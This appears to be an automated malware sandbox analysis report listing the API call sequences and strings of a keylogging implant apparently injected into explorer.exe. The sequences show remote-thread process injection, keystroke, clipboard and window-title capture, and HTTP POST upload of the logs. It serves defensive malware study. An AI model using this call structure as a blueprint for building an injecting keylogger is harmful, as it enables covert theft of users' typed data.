                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                        • Instruction ID: 854f13ea7621927148a9a8b2bf7c264aaceb780fcb2716b8a169ac4b90289c09
                                                        • Opcode Fuzzy Hash: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                        • Instruction Fuzzy Hash: 0CA002B16501006BFD4457E4DD1DF157658B7C4F01F4045447286C50509D7955449F21

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000818F4
                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0008192F
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000819BF
                                                        • RtlMoveMemory.NTDLL(00000000,00083638,00000016), ref: 000819E6
                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081A0E
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081A1E
                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081A38
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00081A40
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A4E
                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A55
                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00081A6B
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A72
                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A88
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AB2
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081AC5
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081ACC
                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081AD3
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AE7
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081AFE
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081B0B
                                                        • CloseHandle.KERNEL32(?), ref: 00081B11
                                                        • CloseHandle.KERNEL32(?), ref: 00081B17
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081B1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                        • String ID: atan$ntdll$opera_shared_counter
                                                        • API String ID: 1066286714-2737717697
                                                        • Opcode ID: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                        • Instruction ID: 174d13c8333c33db2c366c6690c673af472261b50b6cc6d7832f0528390f2b82
                                                        • Opcode Fuzzy Hash: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                        • Instruction Fuzzy Hash: D6614B71204205AFE710EF65DC94EABBBECFF88B54F000519F98997291DB74DE058BA2

                                                        Control-flow Graph

                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000827B5
                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000827CD
                                                        • lstrlen.KERNEL32(?,00000000), ref: 000827D5
                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000827E0
                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000827FA
                                                        • wsprintfA.USER32 ref: 00082811
                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0008282A
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00082834
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                        • String ID: %02X
                                                        • API String ID: 3341110664-436463671
                                                        • Opcode ID: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                        • Instruction ID: 7af9abcfa44f8fdb20a1014f3b0a0b848b8d4329f526ecb6ba9fbd9c9bd4efaa
                                                        • Opcode Fuzzy Hash: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                        • Instruction Fuzzy Hash: A3112B71900108BFEB119B95EC98EEEBFBCFB88B11F104065FA45E2150DA754F459B60
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00081652
                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0008167A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: KeyboardStateUnicode
                                                        • String ID:
                                                        • API String ID: 3453085656-3916222277
                                                        • Opcode ID: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                        • Instruction ID: 29f38b6ab814598dd83ed5aba00077f139db2babf61fac0e1786dbac03cf2fdc
                                                        • Opcode Fuzzy Hash: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                        • Instruction Fuzzy Hash: 1B0184329006299BEB34EB54DD45BFB73FCBF45B10F08441AE9C1E2151E734D9568BA1

                                                        Control-flow Graph

                                                        APIs
                                                        • RtlZeroMemory.NTDLL(00085013,0000001C), ref: 000813C8
                                                        • VirtualQuery.KERNEL32(000813AE,?,0000001C), ref: 000813DA
                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0008140B
                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 0008141C
                                                        • wsprintfA.USER32 ref: 00081433
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081448
                                                        • GetLastError.KERNEL32 ref: 0008144E
                                                        • RtlInitializeCriticalSection.NTDLL(0008582C), ref: 00081465
                                                        • Sleep.KERNEL32(000001F4), ref: 00081489
                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 000814A6
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000814AF
                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 000814D0
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000814D3
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000814F1
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0008150D
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081514
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0008152A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                        • API String ID: 3628807430-1779906909
                                                        • Opcode ID: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                        • Instruction ID: 735b7a70de4e956d7122513613398751e416d658d32f83b3185d311b43a817db
                                                        • Opcode Fuzzy Hash: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                        • Instruction Fuzzy Hash: 7E41B570640B04EBE710BF65EC19E9F3FACFF84B51B004029F6C59A292DB7999018FA1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 255 816b9-816cc RtlEnterCriticalSection 256 817ce-817db RtlLeaveCriticalSection 255->256 257 816d2-816e7 lstrlenW 255->257 258 817cc-817cd 257->258 259 816ed-81700 lstrlenW 257->259 258->256 260 8171e-81721 259->260 261 81702-81719 call 829ce 259->261 263 8174e-81758 GetForegroundWindow 260->263 264 81723-81724 260->264 261->260 263->258 267 8175a-8176f GetWindowTextW 263->267 264->258 266 8172a-8174c call 817dc wsprintfW 264->266 275 817b6-817bd call 829eb 266->275 268 8177a-81789 lstrcmpW 267->268 269 81771-81774 GetClassNameW 267->269 271 8178b-817b3 lstrcpyW call 817dc wsprintfW 268->271 272 817bf-817c6 lstrcatW 268->272 269->268 271->275 272->258 275->258
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(0008582C), ref: 000816C4
                                                        • lstrlenW.KERNEL32 ref: 000816DB
                                                        • lstrlenW.KERNEL32 ref: 000816F3
                                                        • wsprintfW.USER32 ref: 00081743
                                                        • GetForegroundWindow.USER32 ref: 0008174E
                                                        • GetWindowTextW.USER32(00000000,00085850,00000800), ref: 00081767
                                                        • GetClassNameW.USER32(00000000,00085850,00000800), ref: 00081774
                                                        • lstrcmpW.KERNEL32(00085020,00085850), ref: 00081781
                                                        • lstrcpyW.KERNEL32(00085020,00085850), ref: 0008178D
                                                        • wsprintfW.USER32 ref: 000817AD
                                                        • lstrcatW.KERNEL32 ref: 000817C6
                                                        • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000817D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                        • API String ID: 2651329914-3371406555
                                                        • Opcode ID: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                        • Instruction ID: e106a69ff408d8b0d66b3fc31dadf507e352e016c891a9268a5da8e7baf2df89
                                                        • Opcode Fuzzy Hash: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                        • Instruction Fuzzy Hash: CE21B734544A14ABE7217B25FC89EAF3EBCFF81F56B144028F5C196162DE198D028BF5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 284 825f1-8262f GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 285 8267d-8267f 284->285 286 82631-82635 285->286 287 82681-8268e CloseHandle 285->287 288 82671-82677 Thread32Next 286->288 289 82637-8263b 286->289 288->285 289->288 290 8263d-82656 OpenThread 289->290 291 82658-8265e SuspendThread 290->291 292 82660 ResumeThread 290->292 293 82666-8266d CloseHandle 291->293 292->293 293->288
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00082603
                                                        • GetCurrentThreadId.KERNEL32 ref: 0008260B
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0008261B
                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 00082629
                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00082648
                                                        • SuspendThread.KERNEL32(00000000), ref: 00082658
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082667
                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 00082677
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082682
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                        • String ID:
                                                        • API String ID: 1467098526-0
                                                        • Opcode ID: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                        • Instruction ID: b03dfa3635f73c53ef02778bef4dd97478a1a04b34a9c8620f52957b2d5eb463
                                                        • Opcode Fuzzy Hash: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                        • Instruction Fuzzy Hash: 5D117C31404200EFE711AF60AC5CB6EBEA4FF84B05F000529FAC692150E7388A199FA3

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 820a1-820fc call 8240f call 82a09 call 8298a call 824cc 303 820fe-82115 294->303 304 82117-82123 294->304 307 82127-82129 303->307 304->307 308 823fd-8240c call 829eb 307->308 309 8212f-82166 RtlZeroMemory 307->309 313 8216c-82187 309->313 314 823f5-823fc 309->314 315 821b9-821cb 313->315 316 82189-8219a call 8243d 313->316 314->308 321 821cf-821d1 315->321 322 8219c-821ab 316->322 323 821ad 316->323 325 823e2-823e8 321->325 326 821d7-82233 call 8288d 321->326 324 821af-821b7 322->324 323->324 324->321 327 823ea-823ec call 829eb 325->327 328 823f1 325->328 334 82239-8223e 326->334 335 823db 326->335 327->328 328->314 336 82258-82286 call 82a09 wsprintfW 334->336 337 82240-82251 334->337 335->325 340 82288-8228a 336->340 341 8229f-822b6 336->341 337->336 342 8228b-8228e 340->342 347 822b8-822ee call 82a09 wsprintfW 341->347 348 822f5-8230f 341->348 343 82299-8229b 342->343 344 82290-82295 342->344 343->341 344->342 346 82297 344->346 346->341 347->348 352 823b8-823ce call 829eb 348->352 353 82315-82328 348->353 361 823d0-823d2 call 829eb 352->361 362 823d7 352->362 353->352 356 8232e-82344 call 82a09 353->356 363 82346-82351 356->363 361->362 362->335 365 82353-82360 call 829ce 363->365 366 82365-8237c 363->366 365->366 370 8237e 366->370 371 82380-8238d 366->371 370->371 371->363 372 8238f-82393 371->372 373 823ad-823b4 call 829eb 372->373 374 82395 372->374 373->352 375 82395 call 829bd 374->375 377 8239a-823a7 RtlMoveMemory 375->377 377->373
                                                        APIs
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                          • Part of subcall function 0008298A: lstrlen.KERNEL32(00084FE2,?,00000000,00000000,000820DD,75712B62,00084FE2,00000000), ref: 00082992
                                                          • Part of subcall function 0008298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00084FE2,00000001,00000000,00000000), ref: 000829A4
                                                          • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00082139
                                                        • wsprintfW.USER32 ref: 00082272
                                                        • wsprintfW.USER32 ref: 000822DD
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                        • API String ID: 4204651544-1701262698
                                                        • Opcode ID: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                        • Instruction ID: eb393b0eeacd80a5bfa002af34c47191fe6bec282c1bd132379949c4154c94d3
                                                        • Opcode Fuzzy Hash: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                        • Instruction Fuzzy Hash: A7A13A71608345AFD750AF68D888A6BBBE9FFC8B40F14082DF5C5D7252DA78DA048B52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 379 812ae-812bf 380 812c5-812c7 379->380 381 813a6-813ad 379->381 380->381 382 812cd-812cf 380->382 383 812d4 call 829bd 382->383 384 812d9-812fc lstrlen call 82a09 383->384 387 8136e-81377 call 829eb 384->387 388 812fe-81327 call 82841 RtlZeroMemory 384->388 393 81379-8137d 387->393 394 8139d-813a5 call 829ae 387->394 395 81329-8134f RtlMoveMemory call 82569 388->395 396 81353-81369 RtlMoveMemory call 82569 388->396 397 8137f-81392 call 8255c PathMatchSpecA 393->397 394->381 395->388 405 81351 395->405 396->387 406 8139b 397->406 407 81394-81397 397->407 405->387 406->394 407->397 408 81399 407->408 408->394
                                                        APIs
                                                          • Part of subcall function 000829BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,000812D9,00000000,00000000,?,00000001), ref: 000829C7
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000812DC
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0008138A
                                                          • Part of subcall function 00082841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00081119,00000001), ref: 00082850
                                                          • Part of subcall function 00082841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00081119,00000001), ref: 00082855
                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00081316
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081332
                                                          • Part of subcall function 00082569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0008136E), ref: 00082591
                                                          • Part of subcall function 00082569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0008259A
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008135F
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                        • String ID:
                                                        • API String ID: 2993730741-0
                                                        • Opcode ID: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                        • Instruction ID: d5e7a5d4c6fba1c9ca2a6b0442937c699363d6c36e7367382e75030dee9f6b60
                                                        • Opcode Fuzzy Hash: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                        • Instruction Fuzzy Hash: 5E219C707042129F8714FF2898558BEB7DEBF84B10B10092EF8D2D3242DB74DE0A8B62

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 409 81581-81592 411 81598-8159b 409->411 412 81624-81628 409->412 413 8159d-815a0 411->413 414 815a7-815b3 GlobalFix 411->414 413->414 415 815a2-815a5 413->415 416 81623 414->416 417 815b5-815b9 414->417 415->412 415->414 416->412 418 815e9 417->418 419 815bb-815be 417->419 420 815eb-815f2 call 8293e 418->420 421 815c0-815c3 419->421 422 815e4-815e7 419->422 424 815f4-815fd call 82724 420->424 421->424 425 815c5-815e2 lstrlenW call 82a09 lstrcatW 421->425 422->420 431 8161b-81622 GlobalUnWire 424->431 432 815ff-81608 lstrlenW 424->432 425->424 431->416 432->431 433 8160a-8160e 432->433 434 8160f call 816b9 433->434 435 81614-81616 call 829eb 434->435 435->431
                                                        APIs
                                                        • GlobalFix.KERNEL32(00000000), ref: 000815A9
                                                        • lstrlenW.KERNEL32(00000000), ref: 000815C6
                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 000815DC
                                                        • lstrlenW.KERNEL32(00000000), ref: 00081600
                                                        • GlobalUnWire.KERNEL32(00000000), ref: 0008161C
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Globallstrlen$Wirelstrcat
                                                        • String ID:
                                                        • API String ID: 2993198917-0
                                                        • Opcode ID: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                        • Instruction ID: 788b0c73e6fd266604e91dee9fcfd0ea141b5d47a36d9ac5700182ba7bd2db02
                                                        • Opcode Fuzzy Hash: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                        • Instruction Fuzzy Hash: D5010432A005119B96A577B9ACA85FE72EEFFC6B117080125F8C7E3212EE388D034750

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 437 81bbd-81bd2 438 81bd4 437->438 439 81c06-81c0e 437->439 440 81bd6-81c04 RtlMoveMemory 438->440 441 81c69-81c71 439->441 442 81c10-81c15 439->442 440->439 440->440 444 81cb1 441->444 445 81c73-81c85 441->445 443 81c64-81c67 442->443 443->441 447 81c17-81c2a LoadLibraryA 443->447 446 81cb3-81cb8 444->446 445->444 448 81c87-81ca4 LdrProcessRelocationBlock 445->448 450 81cbb-81cbd 447->450 451 81c30-81c35 447->451 448->444 449 81ca6-81caa 448->449 449->444 452 81cac-81caf 449->452 450->446 453 81c5c-81c5f 451->453 452->444 452->448 454 81c61 453->454 455 81c37-81c3b 453->455 454->443 456 81c3d-81c40 455->456 457 81c42-81c45 455->457 458 81c47-81c51 GetProcAddress 456->458 457->458 458->450 459 81c53-81c59 458->459 459->453
                                                        APIs
                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00081BF4
                                                        • LoadLibraryA.KERNEL32(?), ref: 00081C1C
                                                        • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081C49
                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081C9A
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                        • String ID:
                                                        • API String ID: 3827878703-0
                                                        • Opcode ID: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                        • Instruction ID: 882ca4903ef036f6b5f5890f1cff92f57d062729b07f76d901994030c3102d93
                                                        • Opcode Fuzzy Hash: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                        • Instruction Fuzzy Hash: 8731AF71744616AFCB68DF29D885BA6B7ECBF15314F14412CE8C6C7200E736E846CBA0
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(0008582C), ref: 00081839
                                                        • lstrlenW.KERNEL32 ref: 00081845
                                                        • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000818A9
                                                        • Sleep.KERNEL32(00007530), ref: 000818B4
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                        • String ID:
                                                        • API String ID: 2134730579-0
                                                        • Opcode ID: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                        • Instruction ID: 7c053be448574412fdc363f5d5491aaf5b64503bb00f6c028054f82ac53ad905
                                                        • Opcode Fuzzy Hash: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                        • Instruction Fuzzy Hash: 9201DB70510900EBE314B765EC1A5BE3EA9FF817017100028F0C19B262DE388D01DFA6
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,000811DD), ref: 000826DB
                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 000826ED
                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 00082700
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082716
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                        • String ID:
                                                        • API String ID: 331459951-0
                                                        • Opcode ID: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                        • Instruction ID: 630fcc8948f4ad9a4a54ff0f26d7f5e2b88293ccb917313e272e05edaa6f4c2a
                                                        • Opcode Fuzzy Hash: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                        • Instruction Fuzzy Hash: D0F0BE72806218FFAB20DFA1AD888EEBBBCFF05751B10026AE94093140D7358F009BA1
                                                        APIs
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 000817F3
                                                        • wsprintfW.USER32 ref: 0008181D
                                                        Strings
                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00081817
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                        • API String ID: 377395780-613334611
                                                        • Opcode ID: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                        • Instruction ID: 471151813494080dcc102fe0f31ea5f83efc4e699d331606ea4c247a43dc96ce
                                                        • Opcode Fuzzy Hash: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                        • Instruction Fuzzy Hash: B4F03072900128BADB14ABD99C458FFB2FCFF0CB02B00018AFA81E1181F67C5A50D3B5

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_000E428F 1 Function_000E188C 40 Function_000E1838 1->40 2 Function_000E1F0C 3 Function_000E370C 3->3 26 Function_000E31AC 3->26 3->40 47 Function_000E34C4 3->47 62 Function_000E1C6C 3->62 4 Function_000EAC8D 5 Function_000E1508 6 Function_000E1A88 7 Function_000EB007 8 Function_000E2A04 21 Function_000E2918 8->21 48 Function_000E27C4 8->48 8->62 9 Function_000E1D04 10 Function_000E1405 11 Function_000E2580 12 Function_000E1F00 13 Function_000E1000 14 Function_000EAD00 15 Function_000EA881 16 Function_000E1E1C 16->40 17 Function_000E1E9C 18 Function_000EAB9C 19 Function_000E141D 20 Function_000E4298 22 Function_000E3394 22->6 22->17 22->40 60 Function_000E18D0 22->60 66 Function_000E18E8 22->66 71 Function_000E1860 22->71 77 Function_000E1EF8 22->77 23 Function_000E2D14 23->16 38 Function_000E24B8 23->38 23->40 23->66 23->71 24 Function_000E1B10 25 Function_000EB291 26->24 30 Function_000E25A8 26->30 26->40 58 Function_000E1D54 26->58 26->71 76 Function_000E26F8 26->76 27 Function_000E2E2C 27->1 49 Function_000E2DC0 27->49 27->71 28 Function_000E20AC 28->6 29 Function_000E1CAC 30->11 30->60 65 Function_000E2768 30->65 31 Function_000EB4A8 64 Function_000EB46A 31->64 32 Function_000E1D24 33 Function_000E1822 34 Function_000E27A0 35 Function_000EB2BE 